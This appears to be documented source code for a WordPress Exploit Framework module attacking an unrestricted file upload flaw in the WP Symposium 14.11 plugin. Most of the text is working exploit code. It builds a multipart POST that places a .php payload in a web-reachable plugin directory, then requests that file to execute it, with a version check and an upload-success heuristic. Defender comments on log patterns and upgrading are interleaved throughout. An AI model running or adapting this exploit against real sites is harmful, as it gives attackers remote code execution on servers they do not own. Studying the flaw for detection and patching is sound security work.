class Wpxf::Exploit::SymposiumShellUpload

Public Class Methods

new()
Calls superclass method Wpxf::Net::HttpClient::new
# File lib/wpxf/modules/exploit/shell/symposium_shell_upload.rb, line 7
# Sets up the module and registers its descriptive metadata.
#
# Calls the superclass initializer first, then passes the name, description,
# credits, advisory reference and disclosure date to update_info.
#
# Defender summary: the issue described is an unrestricted file upload. Per
# the description below, an uploaded .php file is written to a web-reachable
# path and runs with the web server's privileges when requested.
def initialize
  super

  summary = 'WP Symposium Plugin for WordPress contains a flaw that allows a '\
            'remote attacker to execute arbitrary PHP code. This flaw exists '\
            'because the /wp-symposium/server/file_upload_form.php script '\
            'does not properly verify or sanitize user-uploaded files. By '\
            'uploading a .php file, the remote system will place the file in '\
            'a user-accessible path. Making a direct request to the uploaded '\
            'file will allow the attacker to execute the script with the '\
            'privileges of the web server.'

  credits = [
    'Claudio Viviani', # Vulnerability disclosure
    'rastating'        # WPXF module
  ]

  # Advisory database identifier(s) for this issue.
  advisories = [['WPVDB', '7716']]

  details = {
    name: 'WP Symposium 14.11 Unrestricted File Upload',
    desc: summary,
    author: credits,
    references: advisories,
    date: 'Dec 11 2014'
  }

  update_info(**details)
end

Public Instance Methods

check()
# File lib/wpxf/modules/exploit/shell/symposium_shell_upload.rb, line 31
# Reports whether the target appears to run an affected wp-symposium release.
#
# Delegates to check_plugin_version_from_readme with the plugin slug and the
# version string '14.12'.
#
# NOTE(review): presumably '14.12' is the first fixed release and anything
# older is reported as vulnerable — confirm against the helper. For defenders
# this is the upgrade target; a readme-derived version can be stale or absent,
# so verify the installed plugin version directly when auditing a site.
def check
  plugin_slug = 'wp-symposium'
  version_bound = '14.12'
  check_plugin_version_from_readme(plugin_slug, version_bound)
end
payload_body_builder(payload_name, directory_name)
# File lib/wpxf/modules/exploit/shell/symposium_shell_upload.rb, line 44
# Builds the multipart form body for the upload request.
#
# The form carries three text fields (uploader_uid, uploader_dir,
# uploader_url) and one file part named files[] whose content is
# payload.encoded.
#
# Defender note: the destination directory and URL are supplied by the client
# in the request itself, and the file part carries a .php filename (see #run).
# Both are useful signals when reviewing web server or WAF logs for this issue.
#
# @param payload_name [String] filename given to the uploaded file part
# @param directory_name [String] directory name placed in uploader_dir
# @return [Utility::BodyBuilder] the populated builder
def payload_body_builder(payload_name, directory_name)
  Utility::BodyBuilder.new.tap do |form|
    form.add_field('uploader_uid', '1')
    form.add_field('uploader_dir', "./#{directory_name}/")

    # Path of the plugin endpoint with the first occurrence of base_uri removed.
    relative_url = symposium_url.sub(base_uri, '')
    form.add_field('uploader_url', relative_url)

    form.add_file_from_string('files[]', payload.encoded, payload_name)
  end
end
run()
Calls superclass method Wpxf::Module#run
# File lib/wpxf/modules/exploit/shell/symposium_shell_upload.rb, line 53
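# Runs the module: uploads the payload, then requests the uploaded file.
#
# Sequence as visible here:
#   1. A multipart POST is sent to index.php under symposium_url.
#   2. If successful_upload accepts the response, a GET is sent to
#      <symposium_url>/<payload_id>/<payload_id>.php.
#
# Defender note: that POST followed by a GET for a .php file beneath the same
# plugin directory is the log pattern to look for. Upgrading the plugin (see
# #check) and denying script execution in upload directories address the
# condition this module relies on.
#
# @return [Boolean] false when the superclass run fails or the upload is not
#   accepted; true once the upload succeeded, whether or not the follow-up GET
#   returned any output
def run
  return false unless super

  emit_info 'Preparing payload...'
  # The same random token names both the upload directory and the file.
  payload_id = Utility::Text.rand_alpha(10)
  payload_file = "#{payload_id}.php"
  payload_url = normalize_uri(symposium_url, payload_id, payload_file)
  builder = payload_body_builder(payload_file, payload_id)

  emit_info 'Uploading the payload...'
  res = nil
  builder.create do |body|
    res = execute_post_request(url: normalize_uri(symposium_url, 'index.php'), body: body)
  end

  unless successful_upload(res)
    # res stays nil when no response was captured. The original dereferenced
    # it unconditionally here and would raise NoMethodError instead of
    # reporting the failure.
    if res
      emit_error "HTTP status: #{res.code}", true
      emit_error "Server returned: #{res.body}", true
    end
    emit_error 'Failed to upload the payload'
    return false
  end

  emit_success "Uploaded the payload to #{payload_url}", true
  emit_info 'Executing the payload...'
  res = execute_get_request(url: payload_url)

  # Output is only echoed when the request returned a non-blank 200 body.
  if res && res.code == 200 && !res.body.strip.empty?
    emit_success "Result: #{res.body}"
  end

  true
end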
successful_upload(res)
# File lib/wpxf/modules/exploit/shell/symposium_shell_upload.rb, line 39
# Decides whether an upload response looks like a success.
#
# A response is accepted when it exists, has status 200, and its body is
# non-empty, does not contain the substring 'error', and is not exactly '0'.
# This is a body-content heuristic, not proof that the file was stored.
#
# @param res [#code, #body, nil] the HTTP response, or nil when none was received
# @return [Boolean, nil] true or false for a response; res itself (nil or
#   false) when no response was given
def successful_upload(res)
  # Hand back the falsy value unchanged, as the short-circuit && chain would.
  return res unless res
  return false unless res.code == 200

  content = res.body
  return false if content.empty?
  return false if content.include?('error')

  !content.eql?('0')
end
symposium_url()
# File lib/wpxf/modules/exploit/shell/symposium_shell_upload.rb, line 35
# Returns the URL of the plugin's server/php directory, built from
# wordpress_url_plugins plus the segments wp-symposium/server/php.
#
# NOTE(review): the module description names
# /wp-symposium/server/file_upload_form.php, while the requests in #run go to
# index.php under this directory — confirm which path to monitor or block.
def symposium_url
  path_segments = %w[wp-symposium server php]
  normalize_uri(wordpress_url_plugins, *path_segments)
end